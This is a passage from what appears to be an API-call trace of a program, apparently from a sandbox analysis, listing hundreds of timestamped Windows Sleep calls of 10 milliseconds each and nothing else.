Sleep (dwMilliseconds=0xa) [0167.133] Sleep (dwMilliseconds=0xa) [0167.211] Sleep (dwMilliseconds=0xa) [0167.236] Sleep (dwMilliseconds=0xa) [0167.241] Sleep (dwMilliseconds=0xa) [0167.256] Sleep (dwMilliseconds=0xa) [0167.273] Sleep (dwMilliseconds=0xa) [0167.288] Sleep (dwMilliseconds=0xa) [0167.303] Sleep (dwMilliseconds=0xa) [0167.319] Sleep (dwMilliseconds=0xa) [0167.645] Sleep (dwMilliseconds=0xa) [0167.678] Sleep (dwMilliseconds=0xa) [0167.725] Sleep (dwMilliseconds=0xa) [0167.779] Sleep (dwMilliseconds=0xa) [0167.788] Sleep (dwMilliseconds=0xa) [0167.802] Sleep (dwMilliseconds=0xa) [0167.818] Sleep (dwMilliseconds=0xa) [0167.834] Sleep (dwMilliseconds=0xa) [0167.849] Sleep (dwMilliseconds=0xa) [0167.866] Sleep (dwMilliseconds=0xa) [0167.912] Sleep (dwMilliseconds=0xa) [0167.958] Sleep (dwMilliseconds=0xa) [0167.998] Sleep (dwMilliseconds=0xa) [0168.005] Sleep (dwMilliseconds=0xa) [0168.023] Sleep (dwMilliseconds=0xa) [0168.037] Sleep (dwMilliseconds=0xa) [0168.052] Sleep (dwMilliseconds=0xa) [0168.070] Sleep (dwMilliseconds=0xa) [0168.086] Sleep (dwMilliseconds=0xa) [0168.131] Sleep (dwMilliseconds=0xa) [0168.178] Sleep (dwMilliseconds=0xa) [0168.216] Sleep (dwMilliseconds=0xa) [0168.224] Sleep (dwMilliseconds=0xa) [0168.240] Sleep (dwMilliseconds=0xa) [0168.274] Sleep (dwMilliseconds=0xa) [0168.287] Sleep (dwMilliseconds=0xa) [0168.302] Sleep (dwMilliseconds=0xa) [0168.350] Sleep (dwMilliseconds=0xa) [0168.400] Sleep (dwMilliseconds=0xa) [0168.447] Sleep (dwMilliseconds=0xa) [0168.458] Sleep (dwMilliseconds=0xa) [0168.473] Sleep (dwMilliseconds=0xa) [0168.489] Sleep (dwMilliseconds=0xa) [0168.507] Sleep (dwMilliseconds=0xa) [0168.522] Sleep (dwMilliseconds=0xa) [0168.568] Sleep (dwMilliseconds=0xa) [0168.616] Sleep (dwMilliseconds=0xa) [0168.679] Sleep (dwMilliseconds=0xa) [0168.692] Sleep (dwMilliseconds=0xa) [0168.708] Sleep (dwMilliseconds=0xa) [0168.724] Sleep (dwMilliseconds=0xa) [0168.741] Sleep (dwMilliseconds=0xa) [0168.790] Sleep (dwMilliseconds=0xa) [0168.837] Sleep (dwMilliseconds=0xa) [0168.887] Sleep (dwMilliseconds=0xa) [0168.895] Sleep (dwMilliseconds=0xa) [0168.912] Sleep (dwMilliseconds=0xa) [0168.925] Sleep (dwMilliseconds=0xa) [0168.942] Sleep (dwMilliseconds=0xa) [0168.957] Sleep (dwMilliseconds=0xa) [0169.004] Sleep (dwMilliseconds=0xa) [0169.052] Sleep (dwMilliseconds=0xa) [0169.088] Sleep (dwMilliseconds=0xa) [0169.097] Sleep (dwMilliseconds=0xa) [0169.114] Sleep (dwMilliseconds=0xa) [0169.129] Sleep (dwMilliseconds=0xa) [0169.153] Sleep (dwMilliseconds=0xa) [0169.160] Sleep (dwMilliseconds=0xa) [0169.175] Sleep (dwMilliseconds=0xa) [0169.222] Sleep (dwMilliseconds=0xa) [0169.270] Sleep (dwMilliseconds=0xa) [0169.312] Sleep (dwMilliseconds=0xa) [0169.316] Sleep (dwMilliseconds=0xa) [0169.332] Sleep (dwMilliseconds=0xa) [0169.348] Sleep (dwMilliseconds=0xa) [0169.363] Sleep (dwMilliseconds=0xa) [0169.381] Sleep (dwMilliseconds=0xa) [0169.436] Sleep (dwMilliseconds=0xa) [0169.473] Sleep (dwMilliseconds=0xa) [0169.508] Sleep (dwMilliseconds=0xa) [0169.518] Sleep (dwMilliseconds=0xa) [0169.535] Sleep (dwMilliseconds=0xa) [0169.554] Sleep (dwMilliseconds=0xa) [0169.565] Sleep (dwMilliseconds=0xa) [0169.581] Sleep (dwMilliseconds=0xa) [0169.630] Sleep (dwMilliseconds=0xa) [0169.677] Sleep (dwMilliseconds=0xa) [0169.729] Sleep (dwMilliseconds=0xa) [0169.737] Sleep (dwMilliseconds=0xa) [0169.752] Sleep (dwMilliseconds=0xa) [0169.768] Sleep (dwMilliseconds=0xa) [0169.794] Sleep (dwMilliseconds=0xa) [0169.812] Sleep (dwMilliseconds=0xa) [0169.847] Sleep (dwMilliseconds=0xa) [0169.894] Sleep (dwMilliseconds=0xa) [0169.958] Sleep (dwMilliseconds=0xa) [0169.986] Sleep (dwMilliseconds=0xa) [0170.002] Sleep (dwMilliseconds=0xa) [0170.018] Sleep (dwMilliseconds=0xa) [0170.067] Sleep (dwMilliseconds=0xa) [0170.117] Sleep (dwMilliseconds=0xa) [0170.151] Sleep (dwMilliseconds=0xa) [0170.163] Sleep (dwMilliseconds=0xa) [0170.173] Sleep (dwMilliseconds=0xa) [0170.190] Sleep (dwMilliseconds=0xa) [0170.207] Sleep (dwMilliseconds=0xa) [0170.220] Sleep (dwMilliseconds=0xa) [0170.241] Sleep (dwMilliseconds=0xa) [0170.306] Sleep (dwMilliseconds=0xa) [0170.359] Sleep (dwMilliseconds=0xa) [0170.424] Sleep (dwMilliseconds=0xa) [0170.439] Sleep (dwMilliseconds=0xa) [0170.509] Sleep (dwMilliseconds=0xa) [0170.595] Sleep (dwMilliseconds=0xa) [0170.645] Sleep (dwMilliseconds=0xa) [0170.735] Sleep (dwMilliseconds=0xa) [0170.753] Sleep (dwMilliseconds=0xa) [0170.769] Sleep (dwMilliseconds=0xa) [0170.782] Sleep (dwMilliseconds=0xa) [0170.877] Sleep (dwMilliseconds=0xa) [0170.969] Sleep (dwMilliseconds=0xa) [0171.012] Sleep (dwMilliseconds=0xa) [0171.047] Sleep (dwMilliseconds=0xa) [0171.094] Sleep (dwMilliseconds=0xa) [0171.187] Sleep (dwMilliseconds=0xa) [0171.262] Sleep (dwMilliseconds=0xa) [0171.311] Sleep (dwMilliseconds=0xa) [0171.328] Sleep (dwMilliseconds=0xa) [0171.376] Sleep (dwMilliseconds=0xa) [0171.417] Sleep (dwMilliseconds=0xa) [0171.457] Sleep (dwMilliseconds=0xa) [0171.501] Sleep (dwMilliseconds=0xa) [0171.559] Sleep (dwMilliseconds=0xa) [0171.564] Sleep (dwMilliseconds=0xa) [0171.586] Sleep (dwMilliseconds=0xa) [0171.593] Sleep (dwMilliseconds=0xa) [0171.611] Sleep (dwMilliseconds=0xa) [0171.642] Sleep (dwMilliseconds=0xa) [0171.721] Sleep (dwMilliseconds=0xa) [0171.768] Sleep (dwMilliseconds=0xa) [0171.819] Sleep (dwMilliseconds=0xa) [0171.830] Sleep (dwMilliseconds=0xa) [0171.845] Sleep (dwMilliseconds=0xa) [0171.858] Sleep (dwMilliseconds=0xa) [0171.906] Sleep (dwMilliseconds=0xa) [0171.982] Sleep (dwMilliseconds=0xa) [0172.037] Sleep (dwMilliseconds=0xa) [0172.085] Sleep (dwMilliseconds=0xa) [0172.093] Sleep (dwMilliseconds=0xa) [0172.110] Sleep (dwMilliseconds=0xa) [0172.124] Sleep (dwMilliseconds=0xa) [0172.143] Sleep (dwMilliseconds=0xa) [0172.170] Sleep (dwMilliseconds=0xa) [0172.278] Sleep (dwMilliseconds=0xa) [0172.359] Sleep (dwMilliseconds=0xa) [0172.452] Sleep (dwMilliseconds=0xa) [0172.468] Sleep (dwMilliseconds=0xa) [0172.488] Sleep (dwMilliseconds=0xa) [0172.577] Sleep (dwMilliseconds=0xa) [0172.627] Sleep (dwMilliseconds=0xa) [0172.676] Sleep (dwMilliseconds=0xa) [0172.686] Sleep (dwMilliseconds=0xa) [0172.718] Sleep (dwMilliseconds=0xa) [0172.742] Sleep (dwMilliseconds=0xa) [0172.763] Sleep (dwMilliseconds=0xa) [0172.830] Sleep (dwMilliseconds=0xa) [0172.877] Sleep (dwMilliseconds=0xa) [0172.918] Sleep (dwMilliseconds=0xa) [0172.919] Sleep (dwMilliseconds=0xa) [0172.935] Sleep (dwMilliseconds=0xa) [0172.959] Sleep (dwMilliseconds=0xa) [0172.971] Sleep (dwMilliseconds=0xa) [0172.993] Sleep (dwMilliseconds=0xa) [0173.030] Sleep (dwMilliseconds=0xa) [0173.076] Sleep (dwMilliseconds=0xa) [0173.132] Sleep (dwMilliseconds=0xa) [0173.138] Sleep (dwMilliseconds=0xa) [0173.161] Sleep (dwMilliseconds=0xa) [0173.184] Sleep (dwMilliseconds=0xa) [0173.218] Sleep (dwMilliseconds=0xa) [0173.279] Sleep (dwMilliseconds=0xa) [0173.338] Sleep (dwMilliseconds=0xa) [0173.389] Sleep (dwMilliseconds=0xa) [0173.415] Sleep (dwMilliseconds=0xa) [0173.438] Sleep (dwMilliseconds=0xa) [0173.449] Sleep (dwMilliseconds=0xa) [0173.466] Sleep (dwMilliseconds=0xa) [0173.513] Sleep (dwMilliseconds=0xa) [0173.560] Sleep (dwMilliseconds=0xa) [0173.600] Sleep (dwMilliseconds=0xa) [0173.608] Sleep (dwMilliseconds=0xa) [0173.627] Sleep (dwMilliseconds=0xa) [0173.641] Sleep (dwMilliseconds=0xa) [0173.653] Sleep (dwMilliseconds=0xa) [0173.675] Sleep (dwMilliseconds=0xa) [0173.687] Sleep (dwMilliseconds=0xa) [0173.739] Sleep (dwMilliseconds=0xa) [0173.794] Sleep (dwMilliseconds=0xa) [0173.847] Sleep (dwMilliseconds=0xa) [0173.869] Sleep (dwMilliseconds=0xa) [0173.876] Sleep (dwMilliseconds=0xa) [0173.902] Sleep (dwMilliseconds=0xa) [0173.921] Sleep (dwMilliseconds=0xa) [0173.968] Sleep (dwMilliseconds=0xa) [0174.016] Sleep (dwMilliseconds=0xa) [0174.071] Sleep (dwMilliseconds=0xa) [0174.073] Sleep (dwMilliseconds=0xa) [0174.152] Sleep (dwMilliseconds=0xa) [0174.211] Sleep (dwMilliseconds=0xa) [0174.247] Sleep (dwMilliseconds=0xa) [0174.379] Sleep (dwMilliseconds=0xa) [0174.419] Sleep (dwMilliseconds=0xa) [0174.465] Sleep (dwMilliseconds=0xa) [0174.501] Sleep (dwMilliseconds=0xa) [0174.542] Sleep (dwMilliseconds=0xa) [0174.587] Sleep (dwMilliseconds=0xa) [0174.589] Sleep (dwMilliseconds=0xa) [0174.604] Sleep (dwMilliseconds=0xa) [0174.635] Sleep (dwMilliseconds=0xa) [0174.682] Sleep (dwMilliseconds=0xa) [0174.760] Sleep (dwMilliseconds=0xa) [0174.832] Sleep (dwMilliseconds=0xa) [0174.872] Sleep (dwMilliseconds=0xa) [0174.899] Sleep (dwMilliseconds=0xa) [0174.900] Sleep (dwMilliseconds=0xa) [0174.916] Sleep (dwMilliseconds=0xa) [0174.938] Sleep (dwMilliseconds=0xa) [0174.948] Sleep (dwMilliseconds=0xa) [0174.963] Sleep (dwMilliseconds=0xa) [0174.986] Sleep (dwMilliseconds=0xa) [0174.994] Sleep (dwMilliseconds=0xa) [0175.044] Sleep (dwMilliseconds=0xa) [0175.092] Sleep (dwMilliseconds=0xa) [0175.146] Sleep (dwMilliseconds=0xa) [0175.151] Sleep (dwMilliseconds=0xa) [0175.861] Sleep (dwMilliseconds=0xa) [0175.899] Sleep (dwMilliseconds=0xa) [0175.963] Sleep (dwMilliseconds=0xa) [0176.055] Sleep (dwMilliseconds=0xa) [0176.149] Sleep (dwMilliseconds=0xa) [0176.198] Sleep (dwMilliseconds=0xa) [0176.214] Sleep (dwMilliseconds=0xa) [0176.229] Sleep (dwMilliseconds=0xa) [0176.252] Sleep (dwMilliseconds=0xa) [0176.262] Sleep (dwMilliseconds=0xa) [0176.300] Sleep (dwMilliseconds=0xa) [0176.367] Sleep (dwMilliseconds=0xa) [0176.417] Sleep (dwMilliseconds=0xa) [0176.493] Sleep (dwMilliseconds=0xa) [0176.523] Sleep (dwMilliseconds=0xa) [0176.539] Sleep (dwMilliseconds=0xa) [0176.555] Sleep (dwMilliseconds=0xa) [0176.605] Sleep (dwMilliseconds=0xa) [0176.650] Sleep (dwMilliseconds=0xa) [0176.712] Sleep (dwMilliseconds=0xa) [0176.730] Sleep (dwMilliseconds=0xa) [0176.741] Sleep (dwMilliseconds=0xa) [0176.775] Sleep (dwMilliseconds=0xa) [0176.832] Sleep (dwMilliseconds=0xa) [0176.875] Sleep (dwMilliseconds=0xa) [0176.991] Sleep (dwMilliseconds=0xa) [0177.009] Sleep (dwMilliseconds=0xa) [0177.067] Sleep (dwMilliseconds=0xa) [0177.096] Sleep (dwMilliseconds=0xa) [0177.139] Sleep (dwMilliseconds=0xa) [0177.194] Sleep (dwMilliseconds=0xa) [0177.260] Sleep (dwMilliseconds=0xa) [0177.305] Sleep (dwMilliseconds=0xa) [0177.319] Sleep (dwMilliseconds=0xa) [0177.371] Sleep (dwMilliseconds=0xa) [0177.413] Sleep (dwMilliseconds=0xa) [0177.460] Sleep (dwMilliseconds=0xa) [0177.495] Sleep (dwMilliseconds=0xa) [0177.505] Sleep (dwMilliseconds=0xa) [0177.554] Sleep (dwMilliseconds=0xa) [0177.571] Sleep (dwMilliseconds=0xa) [0177.588] Sleep (dwMilliseconds=0xa) [0177.601] Sleep (dwMilliseconds=0xa) [0177.663] Sleep (dwMilliseconds=0xa) [0177.685] Sleep (dwMilliseconds=0xa) [0177.734] Sleep (dwMilliseconds=0xa) [0177.769] Sleep (dwMilliseconds=0xa) [0177.772] Sleep (dwMilliseconds=0xa) [0177.788] Sleep (dwMilliseconds=0xa) [0177.843] Sleep (dwMilliseconds=0xa) [0177.862] Sleep (dwMilliseconds=0xa) [0177.906] Sleep (dwMilliseconds=0xa) [0177.978] Sleep (dwMilliseconds=0xa) [0178.023] Sleep (dwMilliseconds=0xa) [0178.091] Sleep (dwMilliseconds=0xa) [0178.104] Sleep (dwMilliseconds=0xa) [0178.115] Sleep (dwMilliseconds=0xa) [0178.130] Sleep (dwMilliseconds=0xa) [0178.176] Sleep (dwMilliseconds=0xa) [0178.244] Sleep (dwMilliseconds=0xa) [0178.318] Sleep (dwMilliseconds=0xa) [0178.422] Sleep (dwMilliseconds=0xa) [0178.429] Sleep (dwMilliseconds=0xa) [0178.458] Sleep (dwMilliseconds=0xa) [0178.531] Sleep (dwMilliseconds=0xa) [0178.578] Sleep (dwMilliseconds=0xa) [0179.721] Sleep (dwMilliseconds=0xa) [0179.787] Sleep (dwMilliseconds=0xa) [0179.822] Sleep (dwMilliseconds=0xa) [0179.831] Sleep (dwMilliseconds=0xa) [0179.886] Sleep (dwMilliseconds=0xa) [0179.914] Sleep (dwMilliseconds=0xa) [0179.953] Sleep (dwMilliseconds=0xa) [0179.995] Sleep (dwMilliseconds=0xa) [0180.026] Sleep (dwMilliseconds=0xa) [0180.067] Sleep (dwMilliseconds=0xa) [0180.103] Sleep (dwMilliseconds=0xa) [0180.119] Sleep (dwMilliseconds=0xa) [0180.128] Sleep (dwMilliseconds=0xa) [0180.175] Sleep (dwMilliseconds=0xa) [0180.204] Sleep (dwMilliseconds=0xa) [0180.269] Sleep (dwMilliseconds=0xa) [0180.318] Sleep (dwMilliseconds=0xa) [0180.363] Sleep (dwMilliseconds=0xa) [0180.407] Sleep (dwMilliseconds=0xa) [0180.474] Sleep (dwMilliseconds=0xa) [0180.502] Sleep (dwMilliseconds=0xa) [0180.549] Sleep (dwMilliseconds=0xa) [0180.565] Sleep (dwMilliseconds=0xa) [0180.582] Sleep (dwMilliseconds=0xa) [0180.602] Sleep (dwMilliseconds=0xa) [0180.644] Sleep (dwMilliseconds=0xa) [0180.679] Sleep (dwMilliseconds=0xa) [0180.732] Sleep (dwMilliseconds=0xa) [0180.760] Sleep (dwMilliseconds=0xa) [0180.771] Sleep (dwMilliseconds=0xa) [0180.819] Sleep (dwMilliseconds=0xa) [0180.853] Sleep (dwMilliseconds=0xa) [0180.859] Sleep (dwMilliseconds=0xa) [0180.969] Sleep (dwMilliseconds=0xa) [0181.043] Sleep (dwMilliseconds=0xa) [0181.080] Sleep (dwMilliseconds=0xa) [0181.094] Sleep (dwMilliseconds=0xa) [0181.134] Sleep (dwMilliseconds=0xa) [0181.170] Sleep (dwMilliseconds=0xa) [0181.172] Sleep (dwMilliseconds=0xa) [0181.203] Sleep (dwMilliseconds=0xa) [0181.242] Sleep (dwMilliseconds=0xa) [0181.275] Sleep (dwMilliseconds=0xa) [0181.325] Sleep (dwMilliseconds=0xa) [0181.352] Sleep (dwMilliseconds=0xa) [0181.364] Sleep (dwMilliseconds=0xa) [0181.472] Sleep (dwMilliseconds=0xa) [0181.586] Sleep (dwMilliseconds=0xa) [0181.654] Sleep (dwMilliseconds=0xa) [0181.679] Sleep (dwMilliseconds=0xa) [0181.699] Sleep (dwMilliseconds=0xa) [0181.707] Sleep (dwMilliseconds=0xa) [0181.736] Sleep (dwMilliseconds=0xa) [0181.782] Sleep (dwMilliseconds=0xa) [0181.863] Sleep (dwMilliseconds=0xa) [0181.886] Sleep (dwMilliseconds=0xa) [0181.889] Sleep (dwMilliseconds=0xa) [0181.909] Sleep (dwMilliseconds=0xa) [0181.922] Sleep (dwMilliseconds=0xa) [0181.962] Sleep (dwMilliseconds=0xa) [0181.995] Sleep (dwMilliseconds=0xa) [0182.094] Sleep (dwMilliseconds=0xa) [0182.413] Sleep (dwMilliseconds=0xa) [0182.458] Sleep (dwMilliseconds=0xa) [0182.631] Sleep (dwMilliseconds=0xa) [0182.668] Sleep (dwMilliseconds=0xa) [0182.708] Sleep (dwMilliseconds=0xa) [0182.792] Sleep (dwMilliseconds=0xa) [0182.797] Sleep (dwMilliseconds=0xa) [0182.810] Sleep (dwMilliseconds=0xa) [0182.842] Sleep (dwMilliseconds=0xa) [0182.888] Sleep (dwMilliseconds=0xa) [0182.981] Sleep (dwMilliseconds=0xa) [0183.075] Sleep (dwMilliseconds=0xa) [0183.122] Sleep (dwMilliseconds=0xa) [0183.170] Sleep (dwMilliseconds=0xa) [0183.247] Sleep (dwMilliseconds=0xa) [0183.340] Sleep (dwMilliseconds=0xa) [0183.402] Sleep (dwMilliseconds=0xa) [0183.511] Sleep (dwMilliseconds=0xa) [0183.605] Sleep (dwMilliseconds=0xa) [0183.700] Sleep (dwMilliseconds=0xa) [0183.746] Sleep (dwMilliseconds=0xa) [0183.839] Sleep (dwMilliseconds=0xa) [0183.934] Sleep (dwMilliseconds=0xa) [0183.995] Sleep (dwMilliseconds=0xa) [0184.043] Sleep (dwMilliseconds=0xa) [0184.089] Sleep (dwMilliseconds=0xa) [0184.182] Sleep (dwMilliseconds=0xa) [0184.276] Sleep (dwMilliseconds=0xa) [0184.332] Sleep (dwMilliseconds=0xa) [0184.373] Sleep (dwMilliseconds=0xa) [0184.751] Sleep (dwMilliseconds=0xa) [0184.812] Sleep (dwMilliseconds=0xa) [0184.859] Sleep (dwMilliseconds=0xa) [0185.076] Sleep (dwMilliseconds=0xa) [0185.428] Sleep (dwMilliseconds=0xa) [0185.431] Sleep (dwMilliseconds=0xa) [0185.446] Sleep (dwMilliseconds=0xa) [0185.494] Sleep (dwMilliseconds=0xa) [0185.544] Sleep (dwMilliseconds=0xa) [0185.603] Sleep (dwMilliseconds=0xa) [0185.759] Sleep (dwMilliseconds=0xa) [0185.786] Sleep (dwMilliseconds=0xa) [0185.791] Sleep (dwMilliseconds=0xa) [0185.854] Sleep (dwMilliseconds=0xa) [0186.031] Sleep (dwMilliseconds=0xa) [0186.097] Sleep (dwMilliseconds=0xa) [0186.584] Sleep (dwMilliseconds=0xa) [0186.588] Sleep (dwMilliseconds=0xa) [0186.773] Sleep (dwMilliseconds=0xa) [0186.820] Sleep (dwMilliseconds=0xa) [0186.877] Sleep (dwMilliseconds=0xa) [0186.918] Sleep (dwMilliseconds=0xa) [0186.965] Sleep (dwMilliseconds=0xa) [0187.018] Sleep (dwMilliseconds=0xa) [0187.129] Sleep (dwMilliseconds=0xa) [0187.168] Sleep (dwMilliseconds=0xa) [0187.267] Sleep (dwMilliseconds=0xa) [0187.307] Sleep (dwMilliseconds=0xa) [0187.321] Sleep (dwMilliseconds=0xa) [0187.334] Sleep (dwMilliseconds=0xa) [0187.422] Sleep (dwMilliseconds=0xa) [0187.476] Sleep (dwMilliseconds=0xa) [0187.537] Sleep (dwMilliseconds=0xa) [0187.562] Sleep (dwMilliseconds=0xa) [0187.568] Sleep (dwMilliseconds=0xa) [0187.614] Sleep (dwMilliseconds=0xa) [0187.692] Sleep (dwMilliseconds=0xa) [0187.755] Sleep (dwMilliseconds=0xa) [0187.849] Sleep (dwMilliseconds=0xa) [0187.906] Sleep (dwMilliseconds=0xa) [0187.967] Sleep (dwMilliseconds=0xa) [0188.031] Sleep (dwMilliseconds=0xa) [0188.076] Sleep (dwMilliseconds=0xa) [0188.115] Sleep (dwMilliseconds=0xa) [0188.129] Sleep (dwMilliseconds=0xa) [0188.156] Sleep (dwMilliseconds=0xa) [0188.191] Sleep (dwMilliseconds=0xa) [0188.238] Sleep (dwMilliseconds=0xa) [0188.333] Sleep (dwMilliseconds=0xa) [0188.426] Sleep (dwMilliseconds=0xa) [0188.519] Sleep (dwMilliseconds=0xa) [0188.541] Sleep (dwMilliseconds=0xa) [0188.551] Sleep (dwMilliseconds=0xa) [0188.661] Sleep (dwMilliseconds=0xa) [0188.707] Sleep (dwMilliseconds=0xa) [0188.764] Sleep (dwMilliseconds=0xa) [0188.769] Sleep (dwMilliseconds=0xa) [0188.784] Sleep (dwMilliseconds=0xa) [0188.800] Sleep (dwMilliseconds=0xa) [0188.826] Sleep (dwMilliseconds=0xa) [0188.837] Sleep (dwMilliseconds=0xa) [0188.880] Sleep (dwMilliseconds=0xa) [0188.943] Sleep (dwMilliseconds=0xa) [0189.036] Sleep (dwMilliseconds=0xa) [0189.112] Sleep (dwMilliseconds=0xa) [0189.207] Sleep (dwMilliseconds=0xa) [0189.362] Sleep (dwMilliseconds=0xa) [0189.455] Sleep (dwMilliseconds=0xa) [0189.510] Sleep (dwMilliseconds=0xa) [0189.552] Sleep (dwMilliseconds=0xa) [0189.580] Sleep (dwMilliseconds=0xa) [0189.620] Sleep (dwMilliseconds=0xa) [0189.705] Sleep (dwMilliseconds=0xa) [0189.798] Sleep (dwMilliseconds=0xa) [0189.901] Sleep (dwMilliseconds=0xa) [0189.939] Sleep (dwMilliseconds=0xa) [0189.999] Sleep (dwMilliseconds=0xa) [0190.142] Sleep (dwMilliseconds=0xa) [0190.225] Sleep (dwMilliseconds=0xa) [0190.266] Sleep (dwMilliseconds=0xa) [0190.321] Sleep (dwMilliseconds=0xa) [0190.382] Sleep (dwMilliseconds=0xa) [0190.438] Sleep (dwMilliseconds=0xa) [0190.486] Sleep (dwMilliseconds=0xa) [0190.501] Sleep (dwMilliseconds=0xa) [0190.548] Sleep (dwMilliseconds=0xa) [0190.599] Sleep (dwMilliseconds=0xa) [0190.672] Sleep (dwMilliseconds=0xa) [0190.720] Sleep (dwMilliseconds=0xa) [0190.751] Sleep (dwMilliseconds=0xa) [0190.799] Sleep (dwMilliseconds=0xa) [0190.845] Sleep (dwMilliseconds=0xa) [0190.899] Sleep (dwMilliseconds=0xa) [0190.922] Sleep (dwMilliseconds=0xa) [0190.950] Sleep (dwMilliseconds=0xa) [0190.959] Sleep (dwMilliseconds=0xa) [0191.017] Sleep (dwMilliseconds=0xa) [0191.068] Sleep (dwMilliseconds=0xa) [0191.115] Sleep (dwMilliseconds=0xa) [0191.172] Sleep (dwMilliseconds=0xa) [0191.194] Sleep (dwMilliseconds=0xa) [0191.218] Sleep (dwMilliseconds=0xa) [0191.265] Sleep (dwMilliseconds=0xa) [0191.358] Sleep (dwMilliseconds=0xa) [0191.425] Sleep (dwMilliseconds=0xa) [0191.464] Sleep (dwMilliseconds=0xa) [0191.481] Sleep (dwMilliseconds=0xa) [0191.486] Sleep (dwMilliseconds=0xa) [0192.072] Sleep (dwMilliseconds=0xa) [0192.077] Sleep (dwMilliseconds=0xa) [0192.091] Sleep (dwMilliseconds=0xa) [0192.107] Sleep (dwMilliseconds=0xa) [0192.154] Sleep (dwMilliseconds=0xa) [0192.220] Sleep (dwMilliseconds=0xa) [0192.266] Sleep (dwMilliseconds=0xa) [0192.290] Sleep (dwMilliseconds=0xa) [0192.294] Sleep (dwMilliseconds=0xa) [0192.341] Sleep (dwMilliseconds=0xa) [0192.435] Sleep (dwMilliseconds=0xa) [0192.531] Sleep (dwMilliseconds=0xa) [0192.655] Sleep (dwMilliseconds=0xa) [0192.747] Sleep (dwMilliseconds=0xa) [0192.856] Sleep (dwMilliseconds=0xa) [0192.918] Sleep (dwMilliseconds=0xa) [0193.028] Sleep (dwMilliseconds=0xa) [0193.507] Sleep (dwMilliseconds=0xa) [0193.550] Sleep (dwMilliseconds=0xa) [0193.745] Sleep (dwMilliseconds=0xa) [0193.870] Sleep (dwMilliseconds=0xa) [0193.922] Sleep (dwMilliseconds=0xa) [0193.980] Sleep (dwMilliseconds=0xa) [0194.010] Sleep (dwMilliseconds=0xa) [0194.057] Sleep (dwMilliseconds=0xa) [0194.077] Sleep (dwMilliseconds=0xa) [0194.093] Sleep (dwMilliseconds=0xa) [0194.104] Sleep (dwMilliseconds=0xa) [0194.152] Sleep (dwMilliseconds=0xa) [0194.175] Sleep (dwMilliseconds=0xa) [0194.189] Sleep (dwMilliseconds=0xa) [0194.229] Sleep (dwMilliseconds=0xa) [0194.249] Sleep (dwMilliseconds=0xa) [0194.262] Sleep (dwMilliseconds=0xa) [0194.276] Sleep (dwMilliseconds=0xa) [0194.323] Sleep (dwMilliseconds=0xa) [0194.348] Sleep (dwMilliseconds=0xa) [0194.354] Sleep (dwMilliseconds=0xa) [0194.401] Sleep (dwMilliseconds=0xa) [0194.426] Sleep (dwMilliseconds=0xa) [0194.431] Sleep (dwMilliseconds=0xa) [0194.447] Sleep (dwMilliseconds=0xa) [0194.494] Sleep (dwMilliseconds=0xa) [0194.522] Sleep (dwMilliseconds=0xa) [0194.525] Sleep (dwMilliseconds=0xa) [0194.572] Sleep (dwMilliseconds=0xa) [0194.600] Sleep (dwMilliseconds=0xa) [0194.603] Sleep (dwMilliseconds=0xa) [0194.620] Sleep (dwMilliseconds=0xa) [0194.666] Sleep (dwMilliseconds=0xa) [0194.708] Sleep (dwMilliseconds=0xa) [0194.760] Sleep (dwMilliseconds=0xa) [0194.782] Sleep (dwMilliseconds=0xa) [0194.790] Sleep (dwMilliseconds=0xa) [0194.806] Sleep (dwMilliseconds=0xa) [0194.853] Sleep (dwMilliseconds=0xa) [0194.869] Sleep (dwMilliseconds=0xa) [0194.884] Sleep (dwMilliseconds=0xa) [0194.924] Sleep (dwMilliseconds=0xa) [0194.944] Sleep (dwMilliseconds=0xa) [0194.958] Sleep (dwMilliseconds=0xa) [0194.962] Sleep (dwMilliseconds=0xa) [0195.009] Sleep (dwMilliseconds=0xa) [0195.027] Sleep (dwMilliseconds=0xa) [0195.040] Sleep (dwMilliseconds=0xa) [0195.088] Sleep (dwMilliseconds=0xa) [0195.121] Sleep (dwMilliseconds=0xa) [0195.134] Sleep (dwMilliseconds=0xa) [0195.181] Sleep (dwMilliseconds=0xa) [0195.208] Sleep (dwMilliseconds=0xa) [0195.211] Sleep (dwMilliseconds=0xa) [0195.227] Sleep (dwMilliseconds=0xa) [0195.278] Sleep (dwMilliseconds=0xa) [0195.296] Sleep (dwMilliseconds=0xa) [0195.305] Sleep (dwMilliseconds=0xa) [0195.353] Sleep (dwMilliseconds=0xa) [0195.379] Sleep (dwMilliseconds=0xa) [0195.383] Sleep (dwMilliseconds=0xa) [0195.399] Sleep (dwMilliseconds=0xa) [0195.431] Sleep (dwMilliseconds=0xa) [0195.467] Sleep (dwMilliseconds=0xa) [0195.477] Sleep (dwMilliseconds=0xa) [0195.524] Sleep (dwMilliseconds=0xa) [0195.544] Sleep (dwMilliseconds=0xa) [0195.555] Sleep (dwMilliseconds=0xa) [0195.571] Sleep (dwMilliseconds=0xa) [0195.617] Sleep (dwMilliseconds=0xa) [0195.642] Sleep (dwMilliseconds=0xa) [0195.648] Sleep (dwMilliseconds=0xa) [0195.696] Sleep (dwMilliseconds=0xa) [0195.720] Sleep (dwMilliseconds=0xa) [0195.727] Sleep (dwMilliseconds=0xa) [0195.742] Sleep (dwMilliseconds=0xa) [0195.780] Sleep (dwMilliseconds=0xa) [0195.821] Sleep (dwMilliseconds=0xa) [0195.867] Sleep (dwMilliseconds=0xa) [0195.897] Sleep (dwMilliseconds=0xa) [0195.898] Sleep (dwMilliseconds=0xa) [0195.924] Sleep (dwMilliseconds=0xa) [0195.929] Sleep (dwMilliseconds=0xa) [0195.992] Sleep (dwMilliseconds=0xa) [0196.038] Sleep (dwMilliseconds=0xa) [0196.069] Sleep (dwMilliseconds=0xa) [0196.069] Sleep (dwMilliseconds=0xa) [0196.085] Sleep (dwMilliseconds=0xa) [0196.101] Sleep (dwMilliseconds=0xa) [0196.117] Sleep (dwMilliseconds=0xa) [0196.147] Sleep (dwMilliseconds=0xa) [0196.163] Sleep (dwMilliseconds=0xa) [0196.212] Sleep (dwMilliseconds=0xa) [0196.257] Sleep (dwMilliseconds=0xa) [0196.299] Sleep (dwMilliseconds=0xa) [0196.303] Sleep (dwMilliseconds=0xa) [0196.319] Sleep (dwMilliseconds=0xa) [0196.336] Sleep (dwMilliseconds=0xa) [0196.350] Sleep (dwMilliseconds=0xa) [0196.366] Sleep (dwMilliseconds=0xa) [0196.381] Sleep (dwMilliseconds=0xa) [0196.429] Sleep (dwMilliseconds=0xa) [0196.478] Sleep (dwMilliseconds=0xa) [0196.518] Sleep (dwMilliseconds=0xa) [0196.523] Sleep (dwMilliseconds=0xa) [0196.539] Sleep (dwMilliseconds=0xa) [0196.553] Sleep (dwMilliseconds=0xa) 